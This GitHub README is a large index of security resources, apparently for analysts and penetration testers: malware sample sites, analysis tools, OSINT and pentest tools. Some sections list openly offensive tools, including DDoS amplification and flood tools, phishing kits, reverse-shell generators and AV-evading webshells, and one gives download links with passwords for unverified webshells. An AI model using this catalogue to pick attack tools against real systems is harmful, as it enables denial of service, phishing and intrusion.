Skip to content

Latest commit

 

History

History
882 lines (752 loc) · 97.5 KB

README.md

File metadata and controls

882 lines (752 loc) · 97.5 KB

Hacking Tools Repository

awjunaid

GitHub contributors GitHub followers YouTube Channel Subscribers Discord X (formerly Twitter) Follow GitHub commit activity Website GitHub repo size

Connect With Me

💰 You can help me by Donating

BuyMeACoffee


Table of Content

Android Malware:

Assembly Language

Introduction

Arithmetic and Logic

Memory and Registers

Symmetric Encryption

  • 3DES: A symmetric-key block cipher (Triple DES), which applies the Data Encryption Standard (DES) cipher algorithm three times to each data block.
  • AES: Symmetric-key block cipher algorithm, widely used for secure and classified data encryption (also known as Rijndael).
  • Blowfish: A symmetric-key block cipher designed in 1993 by Bruce Schneier, featuring key-dependent S-boxes and a complex key schedule.

Asymmetric Encryption

  • DH (Diffie-Hellman): A method for securely exchanging cryptographic keys over a public channel, enabling forward secrecy.
  • ECC (Elliptic Curve Cryptography): Public-key cryptosystems based on the algebraic structure of elliptic curves over finite fields.
  • RSA: One of the first practical public-key cryptosystems, widely used for secure data transmission.

Transform Encryption

Hash Functions

  • MD5: A widely used hash function producing a 128-bit hash value. It has known vulnerabilities but can still serve as a checksum for data integrity.
  • SHA1: A cryptographic hash function designed by NSA, producing a 160-bit hash. It's no longer considered secure.
  • SHA2: A set of hash functions (SHA-256 and SHA-512), providing stronger security compared to SHA-1.
  • SHA3: Part of the SHA-3 family, designed to resist quantum computer attacks, offering security properties such as collision resistance.

Books on Cryptography

DDos Tools

  • DB2AMP: Exploits DB2 Amplification attacks.
  • Heartbleed: Leverages the Heartbleed vulnerability in OpenSSL for DDoS attacks.
  • MDNS: Targets mDNS (Multicast DNS) for amplification.
  • NETBIOS: Amplifies attacks using NETBIOS service.
  • NTP: Leverages the Network Time Protocol (NTP) for DDoS.
  • OVH: Targets OVH servers for massive traffic bursts.
  • SENTINEL: Specific tool for DDoS attacks.
  • SNMP: Uses Simple Network Management Protocol (SNMP) to amplify attacks.
  • SSDP: Exploits SSDP for amplification.
  • SYN: SYN flood attacks, often used in DoS (Denial of Service).
  • TS3: Targets TS3 servers for flooding.
  • UDP: A UDP-based DDoS attack tool.
  • XMLRPC: Exploits XML-RPC for attack amplification.

DDoS Tools (Code-Based)

  • ACK: ACK flood attack tool written in C.
  • ARME: ARME attack simulation in C.
  • CHARGEN: Exploits the CHARGEN service for DoS.
  • DNS: DNS-based DDoS tool in C.
  • DOMINATE: A tool for dominating targeted networks.
  • DRDOS: Distributed Reflection DoS (DRDoS) in Perl.
  • TELNET: Telnet flood attack simulation.
  • SUDP: UDP-based attack tool written in C.
  • STD: Another DoS tool written in C.
  • STCP: TCP-based DoS simulation tool in C.
  • SSYN: SYN flood attack with a slight modification.

Malware samples collected for analysis.

Malware Samples & Repositories

  • Clean MX: A real-time database of malware and malicious domains.
  • Contagio: A collection of recent malware samples and analyses.
  • Exploit Database: Provides exploit and shellcode samples.
  • Infosec - CERT-PA: Malware samples collection and analysis by CERT-PA.
  • InQuest Labs: An ever-growing searchable corpus of malicious Microsoft documents.
  • Javascript Malware Collection: Collection of over 40,000 javascript malware samples.
  • Malpedia: A resource providing rapid identification and actionable context for malware investigations.
  • Malshare: Large repository of malware actively scraped from malicious sites.
  • Ragpicker: Plugin-based malware crawler with pre-analysis and reporting functionalities.
  • theZoo: A collection of live malware samples for analysts.
  • Tracker h3x: Aggregator for malware corpus tracking and malicious download sites.
  • vduddu malware repo: Collection of various malware files and source code.
  • VirusBay: A community-based malware repository and social network.
  • ViruSign: Malware database detected by many anti-malware programs except ClamAV.
  • VirusShare: A malware repository, registration required for access.
  • VX Vault: An active collection of malware samples.
  • Zeltser's Sources: A curated list of malware sample sources compiled by Lenny Zeltser.
  • Zeus Source Code: Source code for the Zeus Trojan, leaked in 2011.
  • VX Underground: A massive and growing collection of free malware samples.

Other Resources

Threat intelligence and IOC resources.

Threat Intelligence Feeds & Blocklists

Documents and Shellcode

*Analyze malicious JS and shellcode from PDFs and Office documents.

Malware Analysis Tools

  • AnalyzePDF: A tool to analyze PDF files and determine if they are malicious.
  • box-js: A tool to study JavaScript malware, with support for JScript/WScript and ActiveX emulation.
  • diStorm: A disassembler used for analyzing malicious shellcode.
  • InQuest Deep File Inspection: Tool for uploading common malware lures for deep inspection and heuristic analysis.
  • JS Beautifier: A tool to unpack and deobfuscate JavaScript code.
  • libemu: A library and tools for emulating x86 shellcode, useful for malware analysis.
  • malpdfobj: Tool for deconstructing malicious PDFs into a JSON representation.
  • OfficeMalScanner: A tool for scanning MS Office documents for malicious traces.
  • olevba: A script for parsing OLE and OpenXML documents to extract useful information, helpful for detecting embedded malware.
  • Origami PDF: Tool for analyzing malicious PDFs.
  • PDF Tools: Includes utilities like pdfid and pdf-parser for analyzing PDF files, developed by Didier Stevens.
  • PDF X-Ray Lite: A backend-free PDF analysis tool, lighter than the full version of PDF X-Ray.
  • peepdf: A Python tool for investigating possibly malicious PDFs.
  • QuickSand: A C-based framework for analyzing malware-laden documents, designed to identify exploits in encodings and extract embedded executables.
  • Spidermonkey: Mozilla's JavaScript engine, used for debugging and analyzing malicious JavaScript.

Network

Analyze network interactions.

Network Traffic Analysis and Malware Detection Tools

  • Bro (Zeek): A powerful network protocol analyzer, scalable for both file and network protocols, and highly used for network traffic analysis and security monitoring.
  • BroYara: Integration of Yara rules into Bro (Zeek), allowing for malware detection within network traffic.
  • CapTipper: Tool for exploring malicious HTTP traffic, used for traffic inspection and analysis.
  • chopshop: A framework designed for protocol analysis and decoding, useful for capturing and analyzing network traffic.
  • CloudShark: A web-based tool for packet analysis, providing an interface for examining network traffic and detecting malware.
  • FakeNet-NG: A next-gen dynamic network analysis tool, useful for malware analysis by emulating network services.
  • Fiddler: A web debugging proxy that intercepts HTTP and HTTPS traffic for analysis and troubleshooting.
  • Hale: A botnet C&C monitor, focused on analyzing command and control traffic.
  • Haka: Open-source security language for describing protocols and applying security policies to live captured traffic.
  • HTTPReplay: A library for parsing and extracting data from PCAP files, including TLS streams.
  • INetSim: A network service emulator, useful for setting up a malware lab and emulating services like HTTP, FTP, and DNS.
  • Laika BOSS: A file-centric malware analysis and intrusion detection system, analyzing file-based threats.
  • Malcolm: A full packet capture (PCAP) and Zeek log analysis tool suite for network traffic analysis.
  • Malcom: A malware communications analyzer, focused on detecting malicious network activity.
  • Maltrail: Malicious traffic detection system using blacklists of malicious IPs and domains with reporting and analysis capabilities.
  • mitmproxy: An intercepting proxy that allows users to inspect and modify network traffic in real-time.
  • Moloch: A large-scale IPv4 traffic capturing, indexing, and database system for packet analysis.
  • NetworkMiner: A network forensic analysis tool that helps in analyzing packet capture (PCAP) files, with a free version available.
  • ngrep: A network packet analyzer that allows users to search through network traffic using grep-like syntax.
  • PcapViz: A tool to visualize network traffic and topology from PCAP files.
  • Python ICAP Yara: An ICAP server with Yara scanning for content and URL analysis, often used for detecting malicious traffic.
  • Squidmagic: A tool designed for analyzing web-based network traffic to detect C&C servers and malicious sites using the Squid proxy server and Spamhaus.
  • Tcpdump: A widely used command-line tool for capturing and analyzing network traffic in real-time.
  • tcpick: A tool to track and reassemble TCP streams from network traffic.
  • tcpxtract: A tool that extracts files from network traffic.
  • Wireshark: The most popular network traffic analysis tool, capable of inspecting and analyzing various network protocols.

Memory Forensics

Tools for dissecting malware in memory images or running systems.

Memory Forensics and Malware Analysis Tools

  • BlackLight: A forensics tool for Windows and macOS supporting analysis of hibernation files, pagefiles, and raw memory. Useful for conducting deep memory analysis on systems.
  • DAMM: Differential analysis of malware in memory using Volatility. This tool helps to detect and compare changes in memory states before and after malware execution.
  • evolve: A web interface for the Volatility Memory Forensics Framework, allowing for easier analysis and reporting.
  • FindAES: A tool that helps identify AES encryption keys within memory dumps, which is useful for decrypting malware or analyzing encrypted data in memory.
  • inVtero.net: A high-speed memory analysis framework developed in .NET for Windows x64, providing support for code integrity checks and memory writes.
  • Muninn: Automates portions of memory analysis using Volatility, generating readable reports of the findings.
  • Orochi: An open-source framework that supports collaborative forensic memory dump analysis, designed for use in team environments.
  • Rekall: A memory forensics framework that was forked from Volatility in 2013, widely used for memory analysis and incident response.
  • TotalRecall: A script based on Volatility, designed to automate various tasks in malware analysis and memory forensics.
  • VolDiff: A tool for running Volatility on memory images taken before and after malware execution, highlighting changes in memory that could indicate malicious activity.
  • Volatility: One of the most advanced and widely used memory forensics frameworks. It provides powerful tools for analyzing memory dumps, detecting malware, and uncovering forensic evidence.
  • VolUtility: A web interface for the Volatility Memory Analysis framework, simplifying its use and visualization of memory analysis results.
  • WDBGARK: A WinDBG extension specifically for detecting rootkits, aiding in live memory inspection for malicious activities.
  • WinDbg: A debugger for live memory inspection and kernel debugging, often used for in-depth system analysis and reverse engineering malware.

Malware Analysis & Reverse Engineering Books:

Cheat Sheets/Tables

  • IDA Cheat Sheet: A quick reference for frequently used IDA Pro commands and shortcuts.
  • Cheat Sheets: Various IT and cybersecurity-related cheat sheets, from networking to reverse engineering.
  • File Signatures: A comprehensive list of file signatures for identifying file types.
  • APT Groups and Operations: Detailed spreadsheet tracking Advanced Persistent Threat (APT) groups and their operations.
  • Ransomware Overview: Catalog of ransomware families, including indicators of compromise and behavior.
  • Intel Assembler Code Table: Instruction set reference for Intel assembly language.
  • ARM Assembly Cheatsheet: A quick guide to basic ARM assembly instructions.
  • APTnotes: Repository of publicly available documents related to APT activities.
  • PE 101: Illustrated guide to the Portable Executable (PE) file format.
  • PDF 101: A deep dive into the structure and quirks of PDF files.
  • PDF Analysis: Tools and techniques for analyzing PDF documents.
  • Digital Forensics and Incident Response: Comprehensive DFIR cheat sheet covering common tools and methodologies.

Decoders

  • CyberChef: A web-based tool for encoding, decoding, and analyzing data.
  • KevtheHermit RAT Decoders: Scripts for decoding configurations from various Remote Access Trojans (RATs).

Debuggers

  • OllyDbg: A 32-bit assembler-level debugger for Windows.
  • Immunity Debugger: A powerful debugger geared toward exploit development.
  • X64dbg: An open-source x64/x32 debugger for Windows.
  • Rvmi: Remote debugger for virtual machine introspection.
  • WinDBG: Microsoft’s debugger for Windows development and analysis.

Disassemblers

  • IDA Pro: Industry-standard interactive disassembler for reverse engineering.
  • Binary Ninja: A modern binary analysis platform with a focus on usability.
  • Radare2: Open-source framework for reverse engineering.
  • Cutter: A GUI frontend for Radare2.
  • BinNavi: Binary analysis IDE for exploring code and data structures.
  • Hopper: A macOS/Linux-based disassembler with decompilation features.
  • Medusa: Open-source disassembler with a focus on simplicity.
  • Disassembler.io: Free online disassembler for quick binary analysis.
  • Ghidra: NSA-developed reverse engineering tool with extensive features.

Static Analysis Tools

  • PEiD: Detects packers, cryptors, and compilers in PE files.
  • McAfee FileInsight: Hex editor with scripting capabilities for analyzing malware.
  • HashMyFiles: Generates file hashes for comparison and verification.
  • CFF Explorer: PE file editor with advanced analysis tools.
  • AnalyzePESig: Tool for identifying suspicious digital signatures in PE files.
  • ByteHist: Visualizes byte-level distribution in binary files.
  • Exeinfo: Provides detailed metadata for PE files.
  • Scylla: Imports reconstruction tool for analyzing dumped PE files.
  • MASTIFF: Automates static analysis of malware.
  • PEframe: Framework for analyzing PE files for malware indicators.
  • PEscan: Scans PE files for suspicious characteristics.
  • PEstudio: Tool for analyzing PE files, detecting anomalies, and unpacking.
  • PE-Bear: PE file reverse-engineering tool.
  • PE-sieve: Detects and dumps in-memory PE modifications.
  • Flare-Floss: Automatically extracts obfuscated strings from malware.
  • PatchDiff2: Binary diffing tool for comparing patched/unpatched binaries.
  • PE Insider: Comprehensive PE file analysis toolkit.
  • Resource Hacker: Editor for viewing, editing, and extracting resources in executables.
  • DarunGrim: Tool for binary diffing and similarity analysis.
  • Mal Tindex: Malware indexing and classification tool.
  • Manalyze: Framework for static analysis of PE files.
  • PDBlaster: Generates PDB files for stripped binaries.
  • ImpFuzzy: Calculates fuzzy hashes based on imports for similarity analysis.
  • Florentino: Static analysis tool focused on script and malware detection.
  • Viper: A versatile platform for managing and analyzing malware samples.

Text/Hex Editor Tools

  • Notepad++: A powerful text editor with support for syntax highlighting and plugins.
  • 010 Editor: A professional-grade hex editor with binary templates for file parsing.
  • HxD: A fast hex editor, disk editor, and RAM editor for Windows.
  • BinText: A tool to extract readable ASCII and Unicode strings from binary files.
  • Hexinator: A hex editor with advanced analysis and reverse engineering capabilities.

Threat Intelligence

  • ThreatMiner: A threat intelligence platform for analyzing malware, domains, and other artifacts.
  • RiskIQ Community: Platform for exploring internet threats and analyzing malicious activity.
  • PasteBin: Often used for data leaks and shared threat intelligence.
  • Shodan: A search engine for internet-connected devices, including vulnerable systems.
  • Censys: Internet-wide scanning and analysis tool for finding exposed systems.
  • DNSdumpster: A domain research tool for identifying DNS records and subdomains.
  • URLHaus: A database of malicious URLs used in malware campaigns.
  • AlienVault OTX: Open Threat Exchange for collaborative threat intelligence sharing.
  • C2 Tracker: Tracks command and control (C2) infrastructure used by malware.
  • MISP: Malware Information Sharing Platform for sharing threat intelligence.
  • The Hive: Incident response platform with collaborative features.
  • Yeti: Your Everyday Threat Intelligence tool for managing and enriching indicators.
  • Using ATT&CK for CTI Training: MITRE ATT&CK-based training for Cyber Threat Intelligence (CTI).
  • PasteScraper: Automates scraping of PasteBin and similar sites for threat intelligence.

OSINT Tools

Server & Network Tools

  • Shodan: Search engine for discovering internet-connected devices.
  • Onyphe: A cyber defense search engine for gathering internet-facing threat data.
  • Censys: Maps the internet for open ports, vulnerabilities, and services.
  • Ivre: Network recon and intrusion detection framework.
  • BGPView: Tool for exploring internet routing and BGP data.
  • DNSDumpster: A tool for DNS and subdomain reconnaissance.
  • CertStream: Monitors real-time Certificate Transparency logs for new domain certificates.
  • Exploit Observer: Tracks known exploits across the internet.
  • Subdomain Center: Automated subdomain enumeration service.
  • Malcore: Malware scanning and threat analysis platform.
  • SearchCode: Source code search engine for vulnerability hunting.
  • Internet Intelligence: Monitors exposed services, devices, and vulnerabilities.
  • Criminal IP: Threat intelligence platform focused on vulnerabilities and threat hunting.
  • GreyNoise: Provides context about internet-wide noise and non-malicious scans.
  • Arkham Intelligence: Tracks on-chain crypto assets and related threat activities.
  • WhatsMyName: OSINT username enumeration tool.
  • DeHashed: Search engine for breached data and credentials.
  • WhiteIntel: Platform for analyzing threat actor activities.
  • ManyPasswords: Repository of common password lists for brute-forcing.
  • DNS History: Historical DNS records lookup tool.
  • Global Terrorism Catalogue: Dataset tracking global terrorism events.
  • Public Intelligence: Repository of government and security-related documents.
  • CINS Army: List of known malicious IPs for threat analysis.
  • Umbrella List: Cisco Umbrella threat intelligence database.
  • Malware Bazaar: Repository of malware samples and associated indicators.
  • War on the Rocks: Articles on cybersecurity, geopolitics, and military strategy.
  • IntelligenceX: Advanced search engine for public and dark web content.
  • Counter Extremism: Information on extremist organizations and countermeasures.
  • MITRE ATT&CK: Knowledge base of adversary tactics, techniques, and procedures (TTPs).
  • Exploit Alert: A platform tracking active exploits in the wild.

Search & Intelligence Tools

  • Google: Popular search engine for OSINT and general queries.
  • IntelX: Advanced search engine for public and dark web data.
  • URLScan: Scans and visualizes website interactions for analysis.
  • PublicWWW: Search engine for website source codes.
  • Searchcode: Source code search engine for vulnerabilities and patterns.
  • Grep.app: Tool to search open-source code repositories.
  • Onion Search Engine: Specialized search for .onion sites on the dark web.
  • Archive.org: Internet Archive for accessing historical versions of web pages.
  • Spyonweb: Tool to investigate domains by IP addresses or analytics codes.

Threat Intelligence Tools

  • BinaryEdge: Platform for internet-wide scanning and monitoring.
  • FOFA: Tool for fingerprinting and asset discovery across the internet.
  • ZoomEye: Search engine for discovering networked devices and vulnerabilities.
  • LeakIX: Tracks exposed databases and other leaks online.
  • GreyNoise: Provides context for background internet noise and scans.
  • Pulsedive: Platform for enriching and visualizing threat intelligence indicators.
  • ThreatCrowd: Tool for investigating domains, IPs, and file hashes.
  • ThreatMiner: Threat analysis tool for malware, domains, and IPs.
  • SOC Radar: Threat intelligence and attack surface monitoring tool.

Vulnerability & Malware Tools

  • Vulners: Searchable database of vulnerabilities and exploits.
  • VulDB: Vulnerability database and advisory platform.
  • CVE Mitre: Comprehensive resource for Common Vulnerabilities and Exposures (CVEs).
  • Hybrid Analysis: Malware analysis platform with sandbox features.
  • MalShare: Repository for malware samples and analysis.

Email & Communication Tools

  • Hunter.io: Finds email addresses associated with a domain.
  • Have I Been Pwned: Checks if your email or phone has been part of a data breach.
  • PassiveTotal: Provides domain and IP intelligence for threat hunting.

Wi-Fi & Network Mapping Tools

  • WiGLE: Maps Wi-Fi networks and associated geolocations.

Attack Surface Management Tools

  • Netlas: Monitors exposed assets and provides internet-wide search capabilities.
  • FullHunt: Platform for attack surface and vulnerability management.
  • BinaryEdge: Also listed in threat intelligence, focuses on internet-wide scanning and monitoring.

Penetration Testing

Subdomain

  • subDomainsBrute - A fast sub domain brute tool for pentesters
  • ksubdomain - Subdomain enumeration tool, asynchronous dns packets, use pcap to scan 1600,000 subdomains in 1 second
  • Sublist3r - Fast subdomains enumeration tool for penetration testers
  • OneForAll - OneForAll is a powerful subdomain integration tool
  • LayerDomainFinder - a subdomains enumeration tool by Layer
  • ct - Collect information tools about the target domain.
  • Subfinder - Subfinder is a subdomain discovery tool that discovers valid subdomains for websites. Designed as a passive framework to be useful for bug bounties and safe for penetration testing.
  • Probable_subdomains - Subdomains analysis and generation tool. Reveal the hidden!
    • domains - Generate subdomains and wordlists Online.
  • MassDNS - High-performance DNS stub resolver targeting those who seek to resolve a massive amount of domain names in the order of millions or even billions.
  • altdns - Altdns takes in words that could be present in subdomains under a domain (such as test, dev, staging) as well as takes in a list of subdomains that you know of.
  • dnscan - Fast and lightweight dns bruteforcer with built-in wordlist and zone transfer checks.

Google Hacking

  • GHDB - Google Hack Database
  • SearchDiggity - SearchDiggity 3.1 is the primary attack tool of the Google Hacking Diggity Project
  • Katana - A Python Tool For google Hacking
  • GooFuzz - GooFuzz is a tool to perform fuzzing with an OSINT approach, managing to enumerate directories, files, subdomains or parameters without leaving evidence on the target's server and by means of advanced Google searches (Google Dorking).
  • Pagodo - pagodo (Passive Google Dork) - Automate Google Hacking Database scraping and searching .
  • Google-Dorks - Useful Google Dorks for WebSecurity and Bug Bounty

Github

  • GitHacker - A Git source leak exploit tool that restores the entire Git repository, including data from stash, for white-box auditing and analysis of developers' mind.
  • GitGraber - gitGraber is a tool developed in Python3 to monitor GitHub to search and find sensitive data in real time for different online services.
  • GitMiner - Tool for advanced mining for content on Github.
  • Gitrob - Reconnaissance tool for GitHub organizations.
  • GitGot Semi-automated, feedback-driven tool to rapidly search through troves of public data on GitHub for sensitive secrets.
  • GitDump - A pentesting tool that dumps the source code from .git even when the directory traversal is disabled

Port Scan

  • Nmap | Zenmap - Free and open source utility for network discovery and security auditing
  • Masscan - TCP port scanner, spews SYN packets asynchronously
  • Ports - Common service ports and exploitations
  • Goby - Attack surface mapping
  • Goscan - Interactive Network Scanner
  • NimScan - Fast Port Scanner
  • RustScan - The Modern Port Scanner
  • TXPortMap - Port Scanner & Banner Identify From TianXiang
  • Scaninfo - fast scan for redtools
  • SX - Fast, modern, easy-to-use network scanner
  • Yujianportscan A Fast Port Scanner GUI Tools Build by VB.NET + IOCP
  • Naabu - A fast port scanner written in go with a focus on reliability and simplicity.

Phishing

  • gophish - Open-Source Phishing Toolkit
  • AdvPhishing - This is Advance Phishing Tool ! OTP PHISHING
  • SocialFish - Educational Phishing Tool & Information Collector
  • Zphisher - An automated phishing tool with 30+ templates. This Tool is made for educational purpose only ! Author will not be responsible for any misuse of this toolkit !
  • Nexphisher - Advanced Phishing tool for Linux & Termux

Vulnerability Scanner

  • Struts-Scan - Struts2 vulnerability detection and utilization tools
  • Nikto - Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items
  • W3af - Web application attack and audit framework, the open source web vulnerability scanner
  • Openvas - The world's most advanced Open Source vulnerability scanner and manager
  • Archery - Open Source Vulnerability Assessment and Management helps developers and pentesters to perform scans and manage vulnerabilities
  • Taipan - Web application vulnerability scanner
  • Arachni - Web Application Security Scanner Framework
  • Nuclei - Fast and customizable vulnerability scanner based on simple YAML based DSL.
  • Xray - A passive-vulnerability-scanner Tool.
  • Super-Xray - Web Vulnerability Scanner XRAY GUI Starter
  • SiteScan - AllinOne Website Information Gathering Tools for pentest.
  • Banli - High-risk asset identification and high-risk vulnerability scanner.
  • vscan - Open Source Vulnerability Scanner.
  • Wapiti - Web vulnerability scanner written in Python3.
  • Scaninfo - fast scan for redtools
  • osv-scanner - Vulnerability scanner written in Go which uses the data provided by https://osv.dev
  • Afrog - A Vulnerability Scanning Tools For Penetration Testing
  • OpalOPC - A vulnerability and misconfiguration scanner for OPC UA applications

CMS & Framwork Identification

  • AngelSword - CMS vulnerability detection framework
  • WhatWeb - Next generation web scanner
  • Wappalyzer - Cross-platform utility that uncovers the technologies used on websites
  • Whatruns - A free browser extension that helps you identify technologies used on any website at the click of a button (Just for chrome)
  • WhatCMS - CMS Detection and Exploit Kit based on Whatcms.org API
  • CMSeeK - CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and over 180 other CMSs
  • EHole - CMS Detection for RedTeam
  • ObserverWard - Cross platform community web fingerprint identification tool
  • Yunsee - Online website for to find the CMS footprint
  • Bugscaner - A simple online fingerprint identification system that supports hundreds of cms source code recognition
  • WhatCMS online - CMS Detection and Exploit Kit website Whatcms.org
  • TideFinger - Fingerprinter Tool from TideSec Team
  • 360finger-p - Fingerprinter Tool from 360 Team

Web Applications Proxies

  • Burpsuite - Burpsuite is a graphical tool for testing Web application security
  • ZAP One of the world’s most popular free security tools
  • Mitmproxy - An interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.
  • Broxy - An HTTP/HTTPS intercept proxy written in Go.
  • Hetty - An HTTP toolkit for security research.
  • Proxify - Swiss Army knife Proxy tool for HTTP/HTTPS traffic capture, manipulation, and replay on the go.

Web Crawlers & Directory Brute Force

  • Dirbrute - Multi-thread WEB directory blasting tool (with dics inside)
  • Dirb - DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the responses.
  • ffuf - Fast web fuzzer written in Go.
  • Dirbuster - DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers.
  • Dirsearch - Web path scanner.
  • Gobuster Directory/File, DNS and VHost busting tool written in Go.
  • WebPathBrute - Web path Bruter.
  • wfuzz - Web application fuzzer
  • Dirmap - An advanced web directory & file scanning tool that will be more powerful than DirBuster, Dirsearch, cansina, and Yu Jian.
  • YJdirscan - Yujian dirscan Gui Pro

Docker Scanners

  • Fuxi-Scanner - open source network security vulnerability scanner, it comes with multiple functions.
  • Xunfeng - The patrol is a rapid emergency response and cruise scanning system for enterprise intranets.
  • WebMap - Nmap Web Dashboard and Reporting.
  • Pentest-Collaboration-Framework - Opensource, cross-platform and portable toolkit for automating routine processes when carrying out various works for testing!

Password Attacks

  • Hydra - Hydra is a parallelized login cracker which supports numerous protocols to attack
  • Medusa - Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer
  • Sparta - Network Infrastructure Penetration Testing Tool.
  • Hashcat - World's fastest and most advanced password recovery utility
  • Patator - Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.
  • HackBrowserDat - Decrypt passwords/cookies/history/bookmarks from the browser
  • John - John the Ripper jumbo - advanced offline password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs, GPUs, and even some FPGAs.
  • crowbar - brute forcing tool that can be used during penetration tests. Supports OpenVPN, RDP (with NLA), ssh and VNC.

Wordlists

  • wordlists - Real-world infosec wordlists, updated regularly
  • psudohash - Password list generator that focuses on keywords mutated by commonly used password creation patterns
  • wister - A wordlist generator tool, that allows you to supply a set of words, giving you the possibility to craft multiple variations from the given words, creating a unique and ideal wordlist to use regarding a specific target.
  • Rockyou - wordlists packaging for Kali Linux.
  • Weakpass - For any kind of bruteforce find wordlists.

Wireless Tools

  • Fern Wifi cracker - Fern-Wifi-Cracker is designed to be used in testing and discovering flaws in ones own network with the aim of fixing the flaws detected
  • EAPHammer - EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks.
  • Wifite2 - Wifite is designed to use all known methods for retrieving the password of a wireless access point.
  • JackIt - Implementation of Bastille's MouseJack exploit. Easy entry point through wireless keyboards and mices during redteam engagement.

Cross-site Scripting (XSS)

  • BeeF - The Browser Exploitation Framework Project
  • BlueLotus_XSSReceiver - XSS Receiver platform without SQL
  • XSStrike - Most advanced XSS scanner.
  • xssor2 - XSS'OR - Hack with JavaScript.
  • Xsser-Varbaek - From XSS to RCE 2.75 - Black Hat Europe Arsenal 2017 + Extras
  • Xsser-Epsylon - Cross Site "Scripter" (aka XSSer) is an automatic framework to detect, exploit and report XSS vulnerabilities in web-based applications.
  • Xenotix - An advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework
  • PwnXSS - PwnXSS: Vulnerability (XSS) scanner exploit
  • dalfox - DalFox is an powerful open source XSS scanning tool and parameter analyzer, utility
  • ezXSS - ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting.

Sql Injection

  • Sqlmap - Automatic SQL injection and database takeover tool
  • SSQLInjection - SSQLInjection is a SQL injection tool , support Access/MySQL/SQLServer/Oracle/PostgreSQL/DB2/SQLite/Informix Database.
  • Jsql-injection - jSQL Injection is a Java application for automatic SQL database injection.
  • NoSQLMap - Automated NoSQL database enumeration and web application exploitation tool.
  • Sqlmate - A friend of SQLmap which will do what you always expected from SQLmap
  • SQLiScanner - Automatic SQL injection with Charles and sqlmap api
  • sql-injection-payload-list - SQL Injection Payload List
  • Advanced-SQL-Injection-Cheatsheet - A cheat sheet that contains advanced queries for SQL Injection of all types.

Exploit Framework

  • POC-T - Pentest Over Concurrent Toolkit
  • Pocsuite3 - pocsuite3 is an open-sourced remote vulnerability testing framework developed by the Knownsec 404 Team.
  • Metasploit - The world’s most used penetration testing framework
  • Venom - Shellcode generator/compiler/handler (metasploit)
  • Empire - Empire is a PowerShell and Python post-exploitation agent
  • Starkiller - Starkiller is a Frontend for PowerShell Empire.
  • Koadic - Koadic C3 COM Command & Control - JScript RAT
  • Viper - metasploit-framework UI manager Tools
  • MSFvenom-gui - gui tool to create normal payload by msfvenom
  • MYExploit - A GUI Tools for Scanning OA vulnerabilities
  • ronin-exploits - A Ruby micro-framework for writing and running exploits and payloads.

Sniffing & Spoofing

  • WireShark - Wireshark is a network traffic analyzer, or "sniffer", for Unix and Unix-like operating systems.
  • Cain & abel - Cain & Abel is a password recovery tool for Microsoft Operating Systems.
  • Responder - Responder is an LLMNR, NBT-NS and MDNS poisoner.
  • bettercap - ARP, DNS, NDP and DHCPv6 spoofers for MITM attacks on IPv4 and IPv6 based networks
  • EvilFOCA - Evil Foca is a tool for security pentesters and auditors whose purpose it is to test security in IPv4 and IPv6 data networks.

Shell

  • Goshell - Generate reverse shells in command line with Go !
  • Print-My-Shell - Python script wrote to automate the process of generating various reverse shells.
  • Reverse-shell-generator - Hosted Reverse Shell generator with a ton of functionality. -- (Great for CTFs)
  • Girsh - Automatically spawn a reverse shell fully interactive for Linux or Windows victim
  • Blueshell - Generate a reverse shells for RedTeam
  • Clink - Powerful Bash-style command line editing for cmd.exe
  • Natpass - A new RAT Tools, Support Web VNC and Webshell
  • Platypus - A modern multiple reverse shell sessions manager written in go
  • shells - Script for generating revshells
  • Reverse_ssh - SSH based reverse shell
  • Hoaxshell - A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell.

Listener

  • Netcat - Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.
  • Rustcat - Rustcat(rcat) - The modern Port listener and Reverse shell.
  • Rlwrap - A readline wrapper.
  • Pwncat - Fancy reverse and bind shell handler.
  • Powercat - netshell features all in version 2 powershell.
  • Socat - Socat is a flexible, multi-purpose relay tool.

Web Shell

  • Chopper

Tips: The tool comes from the network, no backdoor verification, please choose it on yourself......

Link: https://pan.baidu.com/s/1VnXkoQU-srSllG6JaY0nTA Password: v71d

  • AntSword : Document - AntSword is a cross-platform website management toolkit

  • CKnife - The cross platform webshell tool in java

Tips: The tool comes from the network, no backdoor verification, please choose it on yourself......

Link: https://pan.baidu.com/s/1QZrnWU7DUuJhiXl7u1kELw Password: hjrh

  • Behinder - dynamic binary encryption webshell management client
  • Godzilla - a Java tool to encrypt network traffic
  • Skyscorpion - Modified version of Behinder.
  • PyShell - Multiplatform Python WebShell.
  • Weevely3 - Weaponized web shell.
  • Bantam - A PHP backdoor management and generation tool/C2 featuring end to end encrypted payload streaming designed to bypass WAF, IDS, SIEM systems.
  • Awsome-Webshells - Collection of reverse shells.
  • php-reverse-shell - Simple php reverse shell implemented using binary.
  • Webshell_Generate - Generate kind of Webshells bypass AV

Vulnerability application

  • DVWA - Damn Vulnerable Web Application (DVWA)
  • WebGoat - WebGoat is a deliberately insecure web application maintained by OWASP designed to teach web application security lessons
  • DSVW - DSVW is a deliberately vulnerable web application written in under 100 lines of code, created for educational purposes
  • DVWS - Damn Vulnerable Web Services is an insecure web application with multiple vulnerable web service components that can be used to learn real world web service vulnerabilities
  • XVWA - XVWA is a badly coded web application written in PHP/MySQL that helps security enthusiasts to learn application security
  • BWAPP - A buggy web application whit more than 100 vulnerabilities
  • Sqli-lab - SQLI labs to test error based, Blind boolean based, Time based
  • HackMe-SQL-Injection-Challenges - Hack your friend's online MMORPG game - specific focus, sql injection opportunities
  • XSS-labs - Small set of scripts to practice exploit XSS and CSRF vulnerabilities
  • SSRF-lab - Lab for exploring SSRF vulnerabilities
  • SSRF_Vulnerable_Lab - This Lab contain the sample codes which are vulnerable to Server-Side Request Forgery attack
  • LFI-labs - Small set of PHP scripts to practice exploiting LFI, RFI and CMD injection vulns
